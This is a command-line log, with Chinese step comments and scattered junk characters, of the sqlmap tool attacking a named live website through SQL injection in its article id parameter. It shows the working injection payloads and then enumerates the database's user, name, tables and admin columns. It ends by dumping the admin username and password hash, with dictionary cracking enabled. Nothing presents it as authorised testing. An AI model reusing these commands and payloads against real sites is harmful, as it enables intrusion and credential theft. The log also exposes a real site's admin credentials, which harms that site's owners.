D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 O) t! y1 M8 u8 [2 hms "Mysql" --current-user /* 注解:获取当前用户名称
3 `& x) Y) z% k7 C sqlmap/0.9 - automatic SQL injection and database takeover tool& Q0 t7 G! L7 i5 H- w" B
http://sqlmap.sourceforge.net starting at: 16:53:54! J: \% M2 l- v7 Q7 J6 w+ ^
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, F8 @# d# ^, T& Z6 k- M! C
session file" R: }- G: c) M
[16:53:54] [INFO] resuming injection data from session file+ W- [: @) m9 d/ B8 `$ y
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
: T6 U; E8 [9 k1 U: g0 ? G[16:53:54] [INFO] testing connection to the target url
. }6 u9 f. n J0 nsqlmap identified the following injection points with a total of 0 HTTP(s) reque
, H# g# }% U/ N8 ~1 _sts:
) P" V2 d/ L1 m' u, |- [5 j---
* ~- @1 e1 L' @7 hPlace: GET
; c( Z' F4 D2 j6 x$ vParameter: id
P, F2 a, z) u Type: boolean-based blind
* \8 ~4 D! b) {) S/ c Title: AND boolean-based blind - WHERE or HAVING clause9 i* U1 L+ L' R
Payload: id=276 AND 799=799
# K, f/ K/ S9 v+ C Type: error-based
; H1 I. N1 I' S# M5 @/ M6 p Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
. l7 @. e( H1 B% E7 t Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( B5 X) x2 W- P- z- V3 Y% C9 X120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ o% V7 c& L: q& F) u
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
( Z" s9 y% S" @# M! a3 {. S( x Type: UNION query
) s' D! L# h( V! L$ H ]8 d Title: MySQL UNION query (NULL) - 1 to 10 columns
1 G. T* _" `% A& v- c. H Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% Z. X& [ T0 U9 {8 B% L
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) ~9 Z- o8 [" ~" m: B6 v1 G
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, \& K8 j1 D. @( f, {: K
Type: AND/OR time-based blind
& F8 D, a" u. J: ?5 Y$ o Title: MySQL > 5.0.11 AND time-based blind4 p3 D Q5 m m* w- s" d
Payload: id=276 AND SLEEP(5)
+ s J* R" p- x: U$ s8 I8 R: k---$ N7 x$ G7 z6 V3 }7 ^( N1 h
[16:53:55] [INFO] the back-end DBMS is MySQL
0 e' @( d, n/ p7 o4 d+ Mweb server operating system: Windows
" R+ ]* z2 j4 ^! ^web application technology: Apache 2.2.11, PHP 5.3.0* `$ D5 q5 B0 @) S/ E6 ]$ S' h
back-end DBMS: MySQL 5.0* x/ x; _3 v% W' H% p) F3 t
[16:53:55] [INFO] fetching current user
0 G) X2 G9 l$ C5 xcurrent user: 'root@localhost' 2 r, d- Z/ i, r4 a/ `
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
# S8 {$ H0 w. m/ {0 A3 C, Wtput\www.wepost.com.hk' shutting down at: 16:53:58
5 z) z! Z, T1 A( N- z
" A) y6 ?8 d: p& [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
! g# |( U- B/ |$ F7 J3 C0 qms "Mysql" --current-db /*当前数据库
1 W0 z6 V5 H0 ] G" g- J( p sqlmap/0.9 - automatic SQL injection and database takeover tool
) \1 m$ _. _7 v- G http://sqlmap.sourceforge.net starting at: 16:54:161 ?6 i9 l6 X( Q) ~
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
3 ?8 t; m6 e, z- o session file
" t8 g- g$ b0 B5 a[16:54:16] [INFO] resuming injection data from session file# l5 B" k0 k) I1 ` F7 W
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* ~# z( X7 R, ^6 o2 d% T
[16:54:16] [INFO] testing connection to the target url% B% v$ Z- K6 J+ l
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
& J% u" v% T% O; bsts:8 ]$ R* U% n; g$ q
---- D8 z' J: @" o: J
Place: GET: L4 I/ ~9 j& P' ?% |; w/ S# }
Parameter: id9 k% D' B+ t' b- `* @
Type: boolean-based blind
; e7 R# `9 ?2 y; @8 ^0 D, q Title: AND boolean-based blind - WHERE or HAVING clause
* ]4 \3 i5 R; ]$ L8 {8 [ Payload: id=276 AND 799=799
! e r# x: z: L: B3 E8 Z- h ?0 U4 v Type: error-based# t/ l4 c( [9 Q N4 C) m, G
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 o/ g0 {# ?& e9 K& A& r- B3 y- h Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& U# J; c: G" k/ x$ a: h G120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58- @3 V/ f, x, _/ g" F* {
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& `# h- C2 z9 J4 R- H8 }
Type: UNION query
0 \# s2 E9 ~& b W Title: MySQL UNION query (NULL) - 1 to 10 columns
- ]7 S( c* o* Y5 ^ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 y' w* U. z* A$ R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( G1 Y, A# M& e5 S! s
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. ]0 z; H7 v- j, `
Type: AND/OR time-based blind
) i/ t% Z) G1 h Title: MySQL > 5.0.11 AND time-based blind
; [. ~' K, @: d# |9 K Payload: id=276 AND SLEEP(5)+ `) x& o+ k, n
---
( y$ S! n5 \$ R7 S( ?% M$ O[16:54:17] [INFO] the back-end DBMS is MySQL0 G5 H" Q; `0 W+ _; a# A# |! F
web server operating system: Windows
+ I/ Q0 }- w7 a+ k5 cweb application technology: Apache 2.2.11, PHP 5.3.0
) |4 [* V7 r2 {# G& dback-end DBMS: MySQL 5.0
: y! o7 Q1 \0 C1 s. ]) U- i! r[16:54:17] [INFO] fetching current database e7 y8 Z6 r: S. q6 J* D* ?2 Q
current database: 'wepost'
- X4 b$ Z h" m[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
- m9 M/ r1 V: X$ c6 F- q4 _- vtput\www.wepost.com.hk' shutting down at: 16:54:188 A) Z( z" K1 b. O; K/ ?) z; N5 e0 i
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 A: d! ]* P8 G( \ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名! ]% w' W$ W7 L4 J _, ?* B% I
sqlmap/0.9 - automatic SQL injection and database takeover tool( Y5 I( \3 O! ^' f- ^
http://sqlmap.sourceforge.net starting at: 16:55:25
; s6 c6 h/ ? p7 e- R& |- r[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
- F) p1 I1 w, X! A: |5 S% h/ b/ U session file
; J2 ~: n \3 _) M[16:55:25] [INFO] resuming injection data from session file" Z- {4 E; N% Y6 x# s0 {
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
' b2 |* Y, Y. H[16:55:25] [INFO] testing connection to the target url- v8 ^0 |$ c5 k
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ [3 [8 G. s" X' g1 A' hsts:' u/ O; C) m8 N: W7 A k
---" b: s- \ V8 X' M1 e
Place: GET
[, T* t0 R2 o9 b9 q5 k' O" Z, [# U) JParameter: id
5 ]- ?( l" Y; D+ a Type: boolean-based blind1 ^" K# X% c4 x% P5 j6 ^
Title: AND boolean-based blind - WHERE or HAVING clause
- h5 e+ w" ?3 U; C) B5 u; g Payload: id=276 AND 799=799( y+ Y7 U% V7 {7 v: u
Type: error-based+ N' h7 q1 i2 W3 w% J4 ?1 m
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 }2 N# p8 t) h+ J( T) d- c
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 ^, F A i, ~% n/ [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,589 [: x1 U' g- K
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" K+ L# U; O6 I" [- h$ Q$ t
Type: UNION query8 j9 X8 ^- t& h
Title: MySQL UNION query (NULL) - 1 to 10 columns
" z5 U' ?, @/ Q8 g Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
* O3 e, Q( B* K1 B3 k(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' c0 z" ]; g- y8 |3 }
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
" [8 f$ L- F4 h& z Type: AND/OR time-based blind
6 X. I$ `( P* c Title: MySQL > 5.0.11 AND time-based blind, X: M% v$ L/ A- B7 A
Payload: id=276 AND SLEEP(5)2 R X8 l) z6 |0 Y7 l% R
---
; d. M8 _* d, C3 }: ` {( i[16:55:26] [INFO] the back-end DBMS is MySQL; L, t9 m4 \- z" s# {
web server operating system: Windows; p& _: y$ d5 e! V
web application technology: Apache 2.2.11, PHP 5.3.0* y8 t* v0 q& F$ @, H5 \
back-end DBMS: MySQL 5.00 g V v7 Y6 q# G! v9 f
[16:55:26] [INFO] fetching tables for database 'wepost'
4 J+ z) d% h- x: x[16:55:27] [INFO] the SQL query used returns 6 entries
L3 d2 p& p+ l' G: V WDatabase: wepost
, @( Q: E! J6 A: \4 P) X6 e# o[6 tables]% P/ E) p1 y! F! R7 A1 x
+-------------+
5 L/ v x2 u! R. x$ q* C/ O| admin |
1 T: E' u' j% k2 e1 X| article |+ J# v7 K F" m0 x) G: m& z7 W; g
| contributor |; i' b3 e! D2 s. K$ X
| idea |/ S* a5 y5 {- D0 |
| image |
4 d. y, m; h5 ~| issue |
$ i: Y$ V! D2 g5 a+-------------+
; ^$ l A5 I7 ^$ g[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
8 I& _- g G+ s( [6 Gtput\www.wepost.com.hk' shutting down at: 16:55:33/ m y; s! Q. S0 z6 `9 c9 L; `* V8 ^
. P( ~0 p* I9 m9 w& c1 o
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' }, E! B* p. \% p B, c. A
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
, Q2 m2 U3 K% j% D0 U& Z b1 } sqlmap/0.9 - automatic SQL injection and database takeover tool
: W5 ]3 E; [( C" ^( B4 U http://sqlmap.sourceforge.net starting at: 16:56:06
6 r: C' ~" W/ \4 K& \sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. ?# |) u( e5 i9 \6 ]sts:
1 K* g6 k2 ]; I/ y; }: w% h7 b. @6 D---
+ O) E/ o i! _7 ?Place: GET
V4 `$ l8 }# g" [6 L7 t- ]+ IParameter: id( u" C; |' j$ l- u
Type: boolean-based blind# w o) X) o* x0 y/ Y. }) e
Title: AND boolean-based blind - WHERE or HAVING clause
) p) M. ^ S9 \/ B Payload: id=276 AND 799=799- m9 R2 r" R1 K6 _7 ~
Type: error-based
* ^) g7 r* P& @ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 N6 s7 J# J& B/ h! e1 E3 Q7 j6 ] Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,- C3 G7 @3 D) s
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# V, J. [% }: K }* I7 B+ Q
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): K0 k( i5 R0 J5 Y+ Z; G: w1 g1 ]
Type: UNION query
, c3 ~2 z! x- r8 O Title: MySQL UNION query (NULL) - 1 to 10 columns& z0 P) Y6 R, s1 j/ J: @
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
Z2 V. E" o; F(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), m8 j$ B: u1 A" e. |
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 j" @$ b2 {' L9 P$ O* }. B( w" }5 V Type: AND/OR time-based blind9 ?; @" m5 x ^( @# }. t- D
Title: MySQL > 5.0.11 AND time-based blind
+ p. X4 }/ k/ _" Z6 h. i Payload: id=276 AND SLEEP(5)+ N' M8 K3 L# T5 x4 |3 N8 j+ Y) A; a; x
---
7 g, }7 G/ Z7 g! m0 F7 x: L$ uweb server operating system: Windows
# \( v$ F0 ^% X' dweb application technology: Apache 2.2.11, PHP 5.3.05 Y: h1 m7 b# O: r* e. ^
back-end DBMS: MySQL 5.0; Y4 ~) f3 p* U' X }
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
& T! N+ ~, y6 e/ P9 Y; D6 c; `% Yssion': wepost, wepost! Q. T% e3 |- o0 ?- L. T
Database: wepost$ ?( g$ e* a* D; }0 N- g
Table: admin8 n7 {5 r1 e& z R/ V
[4 columns]
: m: p+ y; J+ A( k8 I$ |; W+----------+-------------+
; P: g6 m6 }7 N( g9 Y; D2 \| Column | Type |
O: k# Q8 j+ P4 a, G+----------+-------------+
: |" j/ q% \: p| id | int(11) |: i. l4 J. r" h1 c
| password | varchar(32) |
, p+ g1 x3 _1 W7 ]* d7 [, _; F| type | varchar(10) |+ A# V4 U s7 b2 C( Q' t" _
| userid | varchar(20) |, t, e7 U- y! S6 t/ s1 j. t
+----------+-------------+, j! k7 b9 Y- n& l+ R2 `. P
shutting down at: 16:56:19 G* E8 [7 _* J; Y
, y( I1 l% H! A* x4 g
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( [* I% O/ D9 t8 a
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
1 C( t' Y! m4 I; J& @ sqlmap/0.9 - automatic SQL injection and database takeover tool
# w, v7 [& o4 e http://sqlmap.sourceforge.net starting at: 16:57:142 I& t" W) g* z$ B7 ^1 B* @0 W
sqlmap identified the following injection points with a total of 0 HTTP(s) reque" r# K& i3 `6 {9 w. V
sts:* ^) A! ^: i' K: j6 U
---8 M# X, r! q- w9 H5 ]4 C
Place: GET3 q& P4 w7 M' ^7 R& ]
Parameter: id
- B, k9 @- ?( B) K% d' z) Q. @+ e8 }" V/ P Type: boolean-based blind% v' ?( K& f7 K# s: U8 L7 d9 l
Title: AND boolean-based blind - WHERE or HAVING clause" a6 p9 o/ b: G& F: x
Payload: id=276 AND 799=799
n T- a& D m& M4 v" v Type: error-based. O! l8 V+ m$ X8 q) g7 U
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
y2 a, {- k/ U2 _$ k9 s7 y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 X) A Y, F/ M+ L6 r% ~
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 r+ E: Z) j) s5 z; k),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
' q! }7 f0 F- P) N Type: UNION query
$ [. s' \& c: [- C. \% o, i: q# D Title: MySQL UNION query (NULL) - 1 to 10 columns3 O9 O* Z) [0 ]# `) [. D- j+ b. G
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, H: X- t$ J; E" d
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, p. r5 u: m! d0 s% M; \CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 N- H6 ]3 C$ d! ?# T/ P
Type: AND/OR time-based blind
# P& O# b' J$ ?' r$ t Title: MySQL > 5.0.11 AND time-based blind
" _: Y( Y9 B/ Y$ K6 K4 s6 q0 m5 { Payload: id=276 AND SLEEP(5), A- V0 d. ?3 p1 m- d1 L8 O
---( _4 z4 A& R- m* u2 N [
web server operating system: Windows6 F/ I5 s5 Z- e+ N
web application technology: Apache 2.2.11, PHP 5.3.0) V1 a; H/ T. ?
back-end DBMS: MySQL 5.0
6 H$ ~$ V1 G0 X( nrecognized possible password hash values. do you want to use dictionary attack o
! `2 N3 y$ [2 a; Hn retrieved table items? [Y/n/q] y# L U& q8 O# p# G
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]* ^3 N i) Y6 E [8 I4 d
do you want to use common password suffixes? (slow!) [y/N] y! {: i* F, p$ D
Database: wepost- T6 q; M: Y2 y! u1 | B9 p* _
Table: admin
3 w7 D4 S0 E0 K$ b5 E1 K8 r4 W% ][1 entry]
1 f! } {( w9 j, f2 |' |9 a/ B% n+----------------------------------+------------+. g+ _& K9 J |" L7 n* d
| password | userid |
# }; A. }& g- e5 L+----------------------------------+------------+
$ o# R- o% d: r0 Z7 ~| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |( f" ^+ }# h7 F" ?, \# m7 v& I
+----------------------------------+------------+
X. ^0 L" k: P7 \0 T shutting down at: 16:58:14: g |; O+ Q& w( z x& y
, N; \0 V/ V C
D:\Python27\sqlmap> |